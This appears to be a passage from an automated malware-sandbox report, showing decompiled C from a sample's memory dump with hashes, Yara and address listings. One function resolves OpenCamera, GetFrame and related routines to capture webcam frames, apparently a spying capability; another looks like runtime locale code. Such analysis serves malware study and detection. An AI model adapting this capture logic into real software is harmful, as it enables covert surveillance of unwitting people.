                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 4f3e5902103fbf73d685bb82c023768945668d30e32b5126960101710bc94102
                                    • Instruction ID: 0e8ff1e7bf94726707b95a2ea2eb2a738027cd1da7e878330fc773e679c7ecaa
                                    • Opcode Fuzzy Hash: 4f3e5902103fbf73d685bb82c023768945668d30e32b5126960101710bc94102
                                    • Instruction Fuzzy Hash: 5171D231900216ABCF21CF59C884BBFBB75EF59324F14222BEA1167282D7789D41C7E9
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00404486, Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 208sleepCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 68%
                                    			E00404486(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __eflags, intOrPtr _a4, char** _a8, signed int _a12) {
				char _v8;
				void* _v40;
				char _v44;
				char _v52;
				char _v56;
				char _v60;
				char _v76;
				void* __esi;
				void* __ebp;
				void* _t26;
				char** _t28;
				intOrPtr* _t30;
				char* _t38;
				intOrPtr _t48;
				signed int _t57;
				signed int _t59;
				char* _t62;
				void* _t66;
				signed int _t67;
				void* _t69;
				signed int _t78;
				void* _t81;
				void* _t129;
				signed int _t131;
				signed int _t133;
				signed int _t134;
				signed int _t135;
				signed int _t136;
				signed int _t137;
				signed int _t141;
				void* _t144;
				void* _t145;
				intOrPtr* _t146;

				_push(__edi);
				_t125 = _a8;
				_t129 = __ecx;
				_t26 = L004027DA(__ecx, _a8);
				_t81 = _t129;
				_t152 = _t26;
				if(_t26 == 0) {
					_push(__ebx);
					L004028B9(_t81, __edx, 0);
					_t28 = E0040223F();
					_t78 = _a12;
					_a8 = _t28;
					_t120 =  *_t28;
					__eflags =  !_t120 - _t78;
					if( !_t120 <= _t78) {
						L004028D8(_t129);
						asm("int3");
						_push(_t129);
						_t30 = L00401F95( &_v8);
						E004042A6( &_v8,  &_v44, 4, 0xffffffff);
						_t144 = (_t141 & 0xfffffff8) - 0xc;
						E004020EC(_t78, _t144, _t120, __eflags, 0x46c238);
						_t145 = _t144 - 0x18;
						E004020EC(_t78, _t145, _t120, __eflags,  &_v60);
						E00417478( &_v76, _t120);
						_t146 = _t145 + 0x30;
						_t131 =  *_t30 - 0x3c;
						__eflags = _t131;
						if(__eflags == 0) {
							L00401E49( &_v52, _t120, __eflags, 0);
							_t38 = E00402489();
							L00401F95(L00401E49( &_v56, _t120, __eflags, 0));
							_t120 = _t38;
							_t133 = L0040F69B();
							__eflags = _t133;
							if(_t133 != 0) {
								 *0x46bac4 = L0040F931(_t133, "OpenCamera");
								 *0x46bac0 = L0040F931(_t133, "CloseCamera");
								_t48 = L0040F931(_t133, "GetFrame");
								_t120 = "FreeFrame";
								 *0x46bac8 = _t48;
								 *0x46babc = L0040F931(_t133, "FreeFrame");
								 *0x46baaa = 1;
								E004020EC(_t78, _t146 - 0x18, "FreeFrame", __eflags, 0x46c1b8);
								_push(0x1b);
								goto L23;
							}
						} else {
							_t134 = _t131 - 1;
							__eflags = _t134;
							if(_t134 == 0) {
								__eflags =  *0x46ba77;
								if(__eflags != 0) {
									goto L20;
								}
							} else {
								_t135 = _t134 - 1;
								__eflags = _t135;
								if(_t135 == 0) {
									 *0x46bac0();
									 *0x46ba77 = 0;
								} else {
									_t136 = _t135 - 1;
									__eflags = _t136;
									if(_t136 == 0) {
										_t57 =  *0x46bac4();
										 *0x46ba77 = _t57;
										__eflags = _t57;
										if(__eflags == 0) {
											goto L15;
										} else {
											L20:
											_t120 = L00436769(_t52, L00401F95(L00401E49( &_v52, _t120, __eflags, 0)));
											L0040471E(_a4, _t54, __eflags);
										}
									} else {
										_t137 = _t136 - 1;
										__eflags = _t137;
										if(_t137 == 0) {
											_t59 =  *0x46bac4();
											 *0x46ba77 = _t59;
											__eflags = _t59;
											if(__eflags == 0) {
												L15:
												E004020EC(_t78, _t146 - 0x18, _t120, __eflags, 0x46c1b8);
												_push(0x41);
												L23:
												L00404AA4(_t78, _a4, _t120, __eflags);
											} else {
												_t62 = L00436769(_t60, L00401F95(L00401E49( &_v52, _t120, __eflags, _t137)));
												 *_t146 = 0x3e8;
												Sleep(??);
												_t120 = _t62;
												L0040471E(_a4, _t62, __eflags);
												 *0x46bac0();
											}
										}
									}
								}
							}
						}
						L00401E74( &_v52, _t120);
						L00401FC7();
						L00401FC7();
						__eflags = 0;
						return 0;
					} else {
						_t65 =  &(_t120[_t78]);
						_a12 =  &(_t120[_t78]);
						__eflags = _t78;
						if(__eflags != 0) {
							_push(0);
							_t67 = L00402815(_t78, _t129, _t120, _t125, __eflags, _t65);
							__eflags = _t67;
							if(_t67 != 0) {
								_push( *_a8);
								_t69 = E00402229(_t129);
								L0040159F(E00402229(_t129) + _t78 * 2, _t69);
								_push(_t78);
								L0040158B(E00402229(_t129), _t125);
								L00402888(_a12);
							}
						}
						_t66 = _t129;
						goto L7;
					}
				} else {
					_t66 = L004035BF(__ebx, _t129, __edx, _t125 - E00402229(_t81) >> 1, _t129, _t152, _t81, _t129, _t125 - E00402229(_t81) >> 1, _a12);
					L7:
					return _t66;
				}
			}




































                                    0x0040448a
                                    0x0040448b
                                    0x0040448e
                                    0x00404491
                                    0x00404496
                                    0x00404498
                                    0x0040449a
                                    0x004044b4
                                    0x004044b7
                                    0x004044be
                                    0x004044c3
                                    0x004044c6
                                    0x004044c9
                                    0x004044cf
                                    0x004044d1
                                    0x00404532
                                    0x00404537
                                    0x00404544
                                    0x00404545
                                    0x00404558
                                    0x0040455d
                                    0x00404567
                                    0x0040456c
                                    0x00404576
                                    0x0040457f
                                    0x00404584
                                    0x00404587
                                    0x00404587
                                    0x0040458a
                                    0x0040466a
                                    0x00404671
                                    0x00404685
                                    0x0040468a
                                    0x00404693
                                    0x00404695
                                    0x00404697
                                    0x004046aa
                                    0x004046bb
                                    0x004046c2
                                    0x004046c7
                                    0x004046cc
                                    0x004046db
                                    0x004046e2
                                    0x004046ee
                                    0x004046f3
                                    0x00000000
                                    0x004046f3
                                    0x00404590
                                    0x00404590
                                    0x00404590
                                    0x00404593
                                    0x0040462f
                                    0x00404636
                                    0x00000000
                                    0x00000000
                                    0x00404599
                                    0x00404599
                                    0x00404599
                                    0x0040459c
                                    0x0040461d
                                    0x00404623
                                    0x0040459e
                                    0x0040459e
                                    0x0040459e
                                    0x004045a1
                                    0x0040460c
                                    0x00404612
                                    0x00404617
                                    0x00404619
                                    0x00000000
                                    0x0040461b
                                    0x0040463c
                                    0x00404658
                                    0x0040465a
                                    0x0040465a
                                    0x004045a3
                                    0x004045a3
                                    0x004045a3
                                    0x004045a6
                                    0x004045ac
                                    0x004045b2
                                    0x004045b7
                                    0x004045b9
                                    0x004045f6
                                    0x00404600
                                    0x00404605
                                    0x004046f5
                                    0x004046f8
                                    0x004045bb
                                    0x004045cd
                                    0x004045d4
                                    0x004045db
                                    0x004045e4
                                    0x004045e6
                                    0x004045eb
                                    0x004045eb
                                    0x004045b9
                                    0x004045a6
                                    0x004045a1
                                    0x0040459c
                                    0x00404593
                                    0x00404701
                                    0x0040470a
                                    0x00404712
                                    0x00404717
                                    0x0040471d
                                    0x004044d3
                                    0x004044d3
                                    0x004044d6
                                    0x004044d9
                                    0x004044db
                                    0x004044dd
                                    0x004044e2
                                    0x004044e7
                                    0x004044e9
                                    0x004044f0
                                    0x004044f2
                                    0x00404503
                                    0x0040450d
                                    0x00404515
                                    0x00404522
                                    0x00404522
                                    0x004044e9
                                    0x00404527
                                    0x00000000
                                    0x00404529
                                    0x0040449c
                                    0x004044ad
                                    0x0040452a
                                    0x0040452d
                                    0x0040452d

                                    APIs
                                      • Part of subcall function 004028D8: std::_Xinvalid_argument.LIBCPMT ref: 004028DD
                                    • Sleep.KERNEL32(00000000,?), ref: 004045DB
                                      • Part of subcall function 0040471E: __EH_prolog.LIBCMT ref: 00404723
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: H_prologSleepXinvalid_argumentstd::_
                                    • String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera
                                    • API String ID: 834325642-3547787478
                                    • Opcode ID: f7ffaf143d67cfa74f05e374ba4646d16360e13fadd6f4bc1149f0de1b936085
                                    • Instruction ID: 36a5e228549547fe3264f4e150403a2e0a3e3e2746ad4685d8a770f54e79c9b4
                                    • Opcode Fuzzy Hash: f7ffaf143d67cfa74f05e374ba4646d16360e13fadd6f4bc1149f0de1b936085
                                    • Instruction Fuzzy Hash: 6651E4B1604200ABCA05BB769D0A66E3B559BC5308F00443FF905BB7E2EF7D8945879E
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0043E550, Relevance: 7.7, APIs: 5, Instructions: 187COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 77%
                                    			E0043E550(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int _v56;
				char _v276;
				short _v278;
				short _v280;
				char _v448;
				signed int _v452;
				signed int _v456;
				short _v458;
				intOrPtr _v460;
				intOrPtr _v464;
				signed int _v468;
				signed int _v472;
				intOrPtr _v508;
				char _v536;
				signed int _v540;
				intOrPtr _v544;
				signed int _v556;
				char _v708;
				signed int _v712;
				signed int _v716;
				short _v718;
				signed int* _v720;
				signed int _v724;
				signed int _v728;
				signed int _v732;
				signed int* _v736;
				signed int _v740;
				signed int _v744;
				signed int _v748;
				signed int _v752;
				char _v820;
				char _v1248;
				char _v1256;
				intOrPtr _v1276;
				signed int _v1292;
				signed int _t241;
				void* _t244;
				signed int _t247;
				signed int _t249;
				signed int _t255;
				signed int _t256;
				signed int _t257;
				signed int _t258;
				signed int _t259;
				signed int _t261;
				signed int _t263;
				void* _t265;
				signed int _t266;
				signed int _t267;
				signed int _t268;
				signed int _t270;
				signed int _t280;
				signed int _t281;
				signed int _t282;
				intOrPtr _t283;
				signed int _t286;
				signed int _t290;
				signed int _t291;
				signed int _t296;
				signed int _t299;
				signed int _t319;
				signed int _t320;
				signed int _t323;
				signed int _t328;
				void* _t330;
				signed int _t332;
				void* _t333;
				intOrPtr _t334;
				signed int _t339;
				signed int _t340;
				intOrPtr* _t343;
				signed int _t357;
				signed int _t359;
				signed int _t361;
				intOrPtr* _t362;
				signed int _t364;
				signed int _t370;
				intOrPtr* _t374;
				intOrPtr* _t377;
				void* _t380;
				intOrPtr* _t381;
				intOrPtr* _t382;
				signed int _t393;
				signed int _t396;
				intOrPtr* _t397;
				signed int _t399;
				signed int* _t403;
				intOrPtr* _t410;
				intOrPtr* _t411;
				signed int _t421;
				short _t422;
				void* _t424;
				signed int _t425;
				signed int _t427;
				intOrPtr _t428;
				signed int _t431;
				intOrPtr _t432;
				signed int _t434;
				signed int _t437;
				intOrPtr _t443;
				signed int _t444;
				signed int _t446;
				signed int _t447;
				signed int _t450;
				signed int _t452;
				signed int _t456;
				signed int* _t457;
				intOrPtr* _t458;
				short _t459;
				void* _t461;
				signed int _t463;
				signed int _t465;
				void* _t467;
				void* _t468;
				void* _t470;
				signed int _t471;
				void* _t472;
				void* _t474;
				signed int _t475;
				void* _t477;
				void* _t479;
				intOrPtr _t491;

				_t420 = __edx;
				_t461 = _t467;
				_t468 = _t467 - 0xc;
				_push(__ebx);
				_push(__esi);
				_v12 = 1;
				_t357 = E0043F98C(__ecx, 0x6a6);
				_t240 = 0;
				_pop(_t370);
				if(_t357 == 0) {
					L20:
					return _t240;
				} else {
					_push(__edi);
					_t2 = _t357 + 4; // 0x4
					_t427 = _t2;
					 *_t427 = 0;
					 *_t357 = 1;
					_t443 = _a4;
					_t4 = _t443 + 0x30; // 0x43dd4f
					_t241 = _t4;
					_push( *_t241);
					_v16 = _t241;
					_push(0x457498);
					_push( *0x457354);
					E0043E48F(_t357, _t370, __edx, _t427, _t443, _t427, 0x351, 3);
					_t470 = _t468 + 0x18;
					_v8 = 0x457354;
					while(1) {
						L2:
						_t244 = E00448207(_t427, 0x351, ";");
						_t471 = _t470 + 0xc;
						if(_t244 != 0) {
							break;
						} else {
							_t8 = _v16 + 0x10; // 0x10
							_t410 = _t8;
							_t339 =  *_v16;
							_v16 = _t410;
							_t411 =  *_t410;
							goto L4;
						}
						while(1) {
							L4:
							_t420 =  *_t339;
							if(_t420 !=  *_t411) {
								break;
							}
							if(_t420 == 0) {
								L8:
								_t340 = 0;
							} else {
								_t420 =  *((intOrPtr*)(_t339 + 2));
								if(_t420 !=  *((intOrPtr*)(_t411 + 2))) {
									break;
								} else {
									_t339 = _t339 + 4;
									_t411 = _t411 + 4;
									if(_t420 != 0) {
										continue;
									} else {
										goto L8;
									}
								}
							}
							L10:
							asm("sbb eax, eax");
							_t370 = _v8 + 0xc;
							_v8 = _t370;
							_v12 = _v12 &  !( ~_t340);
							_t343 = _v16;
							_v16 = _t343;
							_push( *_t343);
							_push(0x457498);
							_push( *_t370);
							E0043E48F(_t357, _t370, _t420, _t427, _t443, _t427, 0x351, 3);
							_t470 = _t471 + 0x18;
							if(_v8 < 0x457384) {
								goto L2;
							} else {
								if(_v12 != 0) {
									E004401F5(_t357);
									_t31 = _t443 + 0x28; // 0x30ff068b
									_t434 = _t427 | 0xffffffff;
									__eflags =  *_t31;
									if(__eflags != 0) {
										asm("lock xadd [ecx], eax");
										if(__eflags == 0) {
											_t32 = _t443 + 0x28; // 0x30ff068b
											E004401F5( *_t32);
										}
									}
									_t33 = _t443 + 0x24; // 0x30ff0c46
									__eflags =  *_t33;
									if( *_t33 != 0) {
										asm("lock xadd [eax], edi");
										__eflags = _t434 == 1;
										if(_t434 == 1) {
											_t34 = _t443 + 0x24; // 0x30ff0c46
											E004401F5( *_t34);
										}
									}
									 *(_t443 + 0x24) = 0;
									 *(_t443 + 0x1c) = 0;
									 *(_t443 + 0x28) = 0;
									 *((intOrPtr*)(_t443 + 0x20)) = 0;
									_t39 = _t443 + 0x40; // 0x10468b00
									_t240 =  *_t39;
								} else {
									_t20 = _t443 + 0x28; // 0x30ff068b
									_t437 = _t427 | 0xffffffff;
									_t491 =  *_t20;
									if(_t491 != 0) {
										asm("lock xadd [ecx], eax");
										if(_t491 == 0) {
											_t21 = _t443 + 0x28; // 0x30ff068b
											E004401F5( *_t21);
										}
									}
									_t22 = _t443 + 0x24; // 0x30ff0c46
									if( *_t22 != 0) {
										asm("lock xadd [eax], edi");
										if(_t437 == 1) {
											_t23 = _t443 + 0x24; // 0x30ff0c46
											E004401F5( *_t23);
										}
									}
									 *(_t443 + 0x24) =  *(_t443 + 0x24) & 0x00000000;
									_t26 = _t357 + 4; // 0x4
									_t240 = _t26;
									 *(_t443 + 0x1c) =  *(_t443 + 0x1c) & 0x00000000;
									 *(_t443 + 0x28) = _t357;
									 *((intOrPtr*)(_t443 + 0x20)) = _t240;
								}
								goto L20;
							}
							goto L130;
						}
						asm("sbb eax, eax");
						_t340 = _t339 | 0x00000001;
						__eflags = _t340;
						goto L10;
					}
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					L0043698A(0);
					asm("int3");
					_push(_t461);
					_t463 = _t471;
					_t472 = _t471 - 0x1d0;
					_t247 =  *0x46a00c; // 0xbd45ae92
					_v56 = _t247 ^ _t463;
					_t249 = _v40;
					_push(_t357);
					_push(_t443);
					_t444 = _v36;
					_push(_t427);
					_t428 = _v44;
					_v508 = _t428;
					__eflags = _t249;
					if(_t249 == 0) {
						_v456 = 1;
						_v468 = 0;
						_t359 = 0;
						_v452 = 0;
						__eflags = _t444;
						if(__eflags == 0) {
							L79:
							E0043E550(_t359, _t370, _t420, _t428, _t444, __eflags, _t428);
							goto L80;
						} else {
							__eflags =  *_t444 - 0x4c;
							if( *_t444 != 0x4c) {
								L58:
								_push(0);
								_t255 = E0043E118(_t359, _t420, _t428, _t444, _t444,  &_v276, 0x83,  &_v448, 0x55);
								_t474 = _t472 + 0x18;
								__eflags = _t255;
								if(_t255 != 0) {
									_t370 = 0;
									__eflags = 0;
									_t421 = _t428 + 0x20;
									_t446 = 0;
									_v452 = _t421;
									do {
										__eflags = _t446;
										if(_t446 == 0) {
											L73:
											_t256 = _v456;
										} else {
											_t374 =  *_t421;
											_t257 =  &_v276;
											while(1) {
												__eflags =  *_t257 -  *_t374;
												_t428 = _v464;
												if( *_t257 !=  *_t374) {
													break;
												}
												__eflags =  *_t257;
												if( *_t257 == 0) {
													L66:
													_t370 = 0;
													_t258 = 0;
												} else {
													_t422 =  *((intOrPtr*)(_t257 + 2));
													__eflags = _t422 -  *((intOrPtr*)(_t374 + 2));
													_v458 = _t422;
													_t421 = _v452;
													if(_t422 !=  *((intOrPtr*)(_t374 + 2))) {
														break;
													} else {
														_t257 = _t257 + 4;
														_t374 = _t374 + 4;
														__eflags = _v458;
														if(_v458 != 0) {
															continue;
														} else {
															goto L66;
														}
													}
												}
												L68:
												__eflags = _t258;
												if(_t258 == 0) {
													_t359 = _t359 + 1;
													__eflags = _t359;
													goto L73;
												} else {
													_t259 =  &_v276;
													_push(_t259);
													_push(_t446);
													_push(_t428);
													L83();
													_t421 = _v452;
													_t474 = _t474 + 0xc;
													__eflags = _t259;
													if(_t259 == 0) {
														_t370 = 0;
														_t256 = 0;
														_v456 = 0;
													} else {
														_t359 = _t359 + 1;
														_t370 = 0;
														goto L73;
													}
												}
												goto L74;
											}
											asm("sbb eax, eax");
											_t258 = _t257 | 0x00000001;
											_t370 = 0;
											__eflags = 0;
											goto L68;
										}
										L74:
										_t446 = _t446 + 1;
										_t421 = _t421 + 0x10;
										_v452 = _t421;
										__eflags = _t446 - 5;
									} while (_t446 <= 5);
									__eflags = _t256;
									if(__eflags != 0) {
										goto L79;
									} else {
										__eflags = _t359;
										goto L77;
									}
								}
								goto L80;
							} else {
								__eflags =  *(_t444 + 2) - 0x43;
								if( *(_t444 + 2) != 0x43) {
									goto L58;
								} else {
									__eflags =  *((short*)(_t444 + 4)) - 0x5f;
									if( *((short*)(_t444 + 4)) != 0x5f) {
										goto L58;
									} else {
										while(1) {
											_t261 = E00449367(_t444, 0x457490);
											_t361 = _t261;
											_v472 = _t361;
											_pop(_t376);
											__eflags = _t361;
											if(_t361 == 0) {
												break;
											}
											_t263 = _t261 - _t444;
											__eflags = _t263;
											_v456 = _t263 >> 1;
											if(_t263 == 0) {
												break;
											} else {
												_t265 = 0x3b;
												__eflags =  *_t361 - _t265;
												if( *_t361 == _t265) {
													break;
												} else {
													_t431 = _v456;
													_t362 = 0x457354;
													_v460 = 1;
													do {
														_t266 = E0044932D( *_t362, _t444, _t431);
														_t472 = _t472 + 0xc;
														__eflags = _t266;
														if(_t266 != 0) {
															goto L45;
														} else {
															_t377 =  *_t362;
															_t420 = _t377 + 2;
															do {
																_t334 =  *_t377;
																_t377 = _t377 + 2;
																__eflags = _t334 - _v468;
															} while (_t334 != _v468);
															_t376 = _t377 - _t420 >> 1;
															__eflags = _t431 - _t377 - _t420 >> 1;
															if(_t431 != _t377 - _t420 >> 1) {
																goto L45;
															}
														}
														break;
														L45:
														_v460 = _v460 + 1;
														_t362 = _t362 + 0xc;
														__eflags = _t362 - 0x457384;
													} while (_t362 <= 0x457384);
													_t359 = _v472 + 2;
													_t267 = E004492DD(_t376, _t359, ";");
													_t428 = _v464;
													_t447 = _t267;
													_pop(_t380);
													__eflags = _t447;
													if(_t447 != 0) {
														L48:
														__eflags = _v460 - 5;
														if(_v460 > 5) {
															_t268 = _v452;
															goto L54;
														} else {
															_push(_t447);
															_t270 = E00448349(_t380,  &_v276, 0x83, _t359);
															_t475 = _t472 + 0x10;
															__eflags = _t270;
															if(_t270 != 0) {
																L82:
																_push(0);
																_push(0);
																_push(0);
																_push(0);
																_push(0);
																L0043698A(0);
																asm("int3");
																_push(_t463);
																_t465 = _t475;
																_v556 =  *0x46a00c ^ _t465;
																_push(_t359);
																_t364 = _v540;
																_push(_t447);
																_push(_t428);
																_t432 = _v544;
																_v1292 = _t364;
																_v1276 = L00441CE2(_t364, _t380, _t420) + 0x278;
																_push( &_v1256);
																_t280 = E0043E118(_t364, _t420, _t432, _v536, _v536,  &_v820, 0x83,  &_v1248, 0x55);
																_t477 = _t475 - 0x2e4 + 0x18;
																__eflags = _t280;
																if(_t280 != 0) {
																	_t450 = _t364 + 2 << 4;
																	__eflags = _t450;
																	_t281 =  &_v280;
																	_v724 = _t450;
																	_t381 =  *((intOrPtr*)(_t450 + _t432));
																	while(1) {
																		_v712 = _v712 & 0x00000000;
																		__eflags =  *_t281 -  *_t381;
																		_t452 = _v724;
																		if( *_t281 !=  *_t381) {
																			break;
																		}
																		__eflags =  *_t281;
																		if( *_t281 == 0) {
																			L91:
																			_t282 = _v712;
																		} else {
																			_t459 =  *((intOrPtr*)(_t281 + 2));
																			__eflags = _t459 -  *((intOrPtr*)(_t381 + 2));
																			_v718 = _t459;
																			_t452 = _v724;
																			if(_t459 !=  *((intOrPtr*)(_t381 + 2))) {
																				break;
																			} else {
																				_t281 = _t281 + 4;
																				_t381 = _t381 + 4;
																				__eflags = _v718;
																				if(_v718 != 0) {
																					continue;
																				} else {
																					goto L91;
																				}
																			}
																		}
																		L93:
																		__eflags = _t282;
																		if(_t282 != 0) {
																			_t382 =  &_v280;
																			_t424 = _t382 + 2;
																			do {
																				_t283 =  *_t382;
																				_t382 = _t382 + 2;
																				__eflags = _t283 - _v712;
																			} while (_t283 != _v712);
																			_v728 = (_t382 - _t424 >> 1) + 1;
																			_t286 = E0043F98C(_t382 - _t424 >> 1, 4 + ((_t382 - _t424 >> 1) + 1) * 2);
																			_v740 = _t286;
																			__eflags = _t286;
																			if(_t286 == 0) {
																				goto L84;
																			} else {
																				_v732 =  *((intOrPtr*)(_t452 + _t432));
																				_v744 =  *(_t432 + 0xa0 + _t364 * 4);
																				_v748 =  *(_t432 + 8);
																				_t391 =  &_v280;
																				_v720 = _t286 + 4;
																				_t290 = L004415D4(_t286 + 4, _v728,  &_v280);
																				_t479 = _t477 + 0xc;
																				__eflags = _t290;
																				if(_t290 != 0) {
																					_t291 = _v712;
																					_push(_t291);
																					_push(_t291);
																					_push(_t291);
																					_push(_t291);
																					_push(_t291);
																					L0043698A(_t291);
																					asm("int3");
																					return  *0x46b508;
																				} else {
																					__eflags = _v280 - 0x43;
																					 *((intOrPtr*)(_t452 + _t432)) = _v720;
																					if(_v280 != 0x43) {
																						L102:
																						_t296 = L0043DE25(_t364, _t391, _t432,  &_v708);
																						_t393 = _v712;
																						 *(_t432 + 0xa0 + _t364 * 4) = _t296;
																					} else {
																						__eflags = _v278;
																						if(_v278 != 0) {
																							goto L102;
																						} else {
																							_t393 = _v712;
																							 *(_t432 + 0xa0 + _t364 * 4) = _t393;
																						}
																					}
																					__eflags = _t364 - 2;
																					if(_t364 != 2) {
																						__eflags = _t364 - 1;
																						if(_t364 != 1) {
																							__eflags = _t364 - 5;
																							if(_t364 == 5) {
																								 *((intOrPtr*)(_t432 + 0x14)) = _v716;
																							}
																						} else {
																							 *((intOrPtr*)(_t432 + 0x10)) = _v716;
																						}
																					} else {
																						_t457 = _v736;
																						_t425 = _t393;
																						_t403 = _t457;
																						 *(_t432 + 8) = _v716;
																						_v720 = _t457;
																						_v728 = _t457[8];
																						_v716 = _t457[9];
																						while(1) {
																							__eflags =  *(_t432 + 8) -  *_t403;
																							if( *(_t432 + 8) ==  *_t403) {
																								break;
																							}
																							_t458 = _v720;
																							_t425 = _t425 + 1;
																							_t328 =  *_t403;
																							 *_t458 = _v728;
																							_v716 = _t403[1];
																							_t403 = _t458 + 8;
																							 *((intOrPtr*)(_t458 + 4)) = _v716;
																							_t364 = _v752;
																							_t457 = _v736;
																							_v728 = _t328;
																							_v720 = _t403;
																							__eflags = _t425 - 5;
																							if(_t425 < 5) {
																								continue;
																							} else {
																							}
																							L110:
																							__eflags = _t425 - 5;
																							if(__eflags == 0) {
																								_t319 = E004493AC(_t364, _t425, _t432, _t457, __eflags, _v712, 1, 0x457410, 0x7f,  &_v536,  *(_t432 + 8), 1);
																								_t479 = _t479 + 0x1c;
																								__eflags = _t319;
																								_t320 = _v712;
																								if(_t319 == 0) {
																									_t457[1] = _t320;
																								} else {
																									do {
																										 *(_t465 + _t320 * 2 - 0x20c) =  *(_t465 + _t320 * 2 - 0x20c) & 0x000001ff;
																										_t320 = _t320 + 1;
																										__eflags = _t320 - 0x7f;
																									} while (_t320 < 0x7f);
																									_t323 = L004337C1( &_v536,  *0x46a170, 0xfe);
																									_t479 = _t479 + 0xc;
																									__eflags = _t323;
																									_t457[1] = 0 | _t323 == 0x00000000;
																								}
																								 *_t457 =  *(_t432 + 8);
																							}
																							 *(_t432 + 0x18) = _t457[1];
																							goto L121;
																						}
																						__eflags = _t425;
																						if(_t425 != 0) {
																							 *_t457 =  *(_t457 + _t425 * 8);
																							_t457[1] =  *(_t457 + 4 + _t425 * 8);
																							 *(_t457 + _t425 * 8) = _v728;
																							 *(_t457 + 4 + _t425 * 8) = _v716;
																						}
																						goto L110;
																					}
																					L121:
																					 *0x453474(_t432);
																					_t299 =  *((intOrPtr*)( *((intOrPtr*)(0x457350 + _t364 * 0xc))))();
																					_t396 = _v732;
																					__eflags = _t299;
																					if(_t299 == 0) {
																						__eflags = _t396 - 0x46a2a8;
																						if(_t396 != 0x46a2a8) {
																							_t456 = _t364 + _t364;
																							__eflags = _t456;
																							asm("lock xadd [eax], ecx");
																							if(_t456 != 0) {
																								goto L126;
																							} else {
																								E004401F5( *((intOrPtr*)(_t432 + 0x28 + _t456 * 8)));
																								E004401F5( *((intOrPtr*)(_t432 + 0x24 + _t456 * 8)));
																								E004401F5( *(_t432 + 0xa0 + _t364 * 4));
																								_t399 = _v712;
																								 *((intOrPtr*)(_v724 + _t432)) = _t399;
																								 *(_t432 + 0xa0 + _t364 * 4) = _t399;
																							}
																						}
																						_t397 = _v740;
																						 *_t397 = 1;
																						 *((intOrPtr*)(_t432 + 0x28 + (_t364 + _t364) * 8)) = _t397;
																					} else {
																						 *(_v724 + _t432) = _t396;
																						E004401F5( *(_t432 + 0xa0 + _t364 * 4));
																						 *(_t432 + 0xa0 + _t364 * 4) = _v744;
																						E004401F5(_v740);
																						 *(_t432 + 8) = _v748;
																						goto L84;
																					}
																					goto L85;
																				}
																			}
																		} else {
																			goto L85;
																		}
																		goto L130;
																	}
																	asm("sbb eax, eax");
																	_t282 = _t281 | 0x00000001;
																	__eflags = _t282;
																	goto L93;
																} else {
																	L84:
																	__eflags = 0;
																	L85:
																	__eflags = _v16 ^ _t465;
																	return L0042FD1B(_v16 ^ _t465);
																}
															} else {
																_t330 = _t447 + _t447;
																__eflags = _t330 - 0x106;
																if(_t330 >= 0x106) {
																	L0042FE4F();
																	goto L82;
																} else {
																	 *((short*)(_t463 + _t330 - 0x10c)) = 0;
																	_t332 =  &_v276;
																	_push(_t332);
																	_push(_v460);
																	_push(_t428);
																	L83();
																	_t472 = _t475 + 0xc;
																	__eflags = _t332;
																	_t268 = _v452;
																	if(_t332 != 0) {
																		_t268 = _t268 + 1;
																		_v452 = _t268;
																	}
																	L54:
																	_t444 = _t359 + _t447 * 2;
																	_t370 = 0;
																	__eflags =  *_t444;
																	if( *_t444 == 0) {
																		L56:
																		__eflags = _t268;
																		L77:
																		if(__eflags != 0) {
																			goto L79;
																		} else {
																		}
																		goto L80;
																	} else {
																		_t444 = _t444 + 2;
																		__eflags =  *_t444;
																		if( *_t444 != 0) {
																			continue;
																		} else {
																			goto L56;
																		}
																	}
																}
															}
														}
													} else {
														_t333 = 0x3b;
														__eflags =  *_t359 - _t333;
														if( *_t359 != _t333) {
															break;
														} else {
															goto L48;
														}
													}
												}
											}
											goto L130;
										}
										goto L80;
									}
								}
							}
						}
					} else {
						__eflags = _t444;
						if(_t444 != 0) {
							_push(_t444);
							_push(_t249);
							_push(_t428);
							L83();
						}
						L80:
						__eflags = _v12 ^ _t463;
						return L0042FD1B(_v12 ^ _t463);
					}
				}
				L130:
			}



































































































































                                    0x0043e550
                                    0x0043e553
                                    0x0043e555
                                    0x0043e558
                                    0x0043e559
                                    0x0043e562
                                    0x0043e56a
                                    0x0043e56c
                                    0x0043e56e
                                    0x0043e571
                                    0x0043e68a
                                    0x0043e68f
                                    0x0043e577
                                    0x0043e577
                                    0x0043e578
                                    0x0043e578
                                    0x0043e57b
                                    0x0043e57e
                                    0x0043e580
                                    0x0043e583
                                    0x0043e583
                                    0x0043e586
                                    0x0043e588
                                    0x0043e58b
                                    0x0043e590
                                    0x0043e59e
                                    0x0043e5a8
                                    0x0043e5ab
                                    0x0043e5ae
                                    0x0043e5ae
                                    0x0043e5b9
                                    0x0043e5be
                                    0x0043e5c3
                                    0x00000000
                                    0x0043e5c9
                                    0x0043e5cc
                                    0x0043e5cc
                                    0x0043e5cf
                                    0x0043e5d1
                                    0x0043e5d4
                                    0x0043e5d4
                                    0x0043e5d4
                                    0x0043e5d6
                                    0x0043e5d6
                                    0x0043e5d6
                                    0x0043e5dc
                                    0x00000000
                                    0x00000000
                                    0x0043e5e1
                                    0x0043e5f8
                                    0x0043e5f8
                                    0x0043e5e3
                                    0x0043e5e3
                                    0x0043e5eb
                                    0x00000000
                                    0x0043e5ed
                                    0x0043e5ed
                                    0x0043e5f0
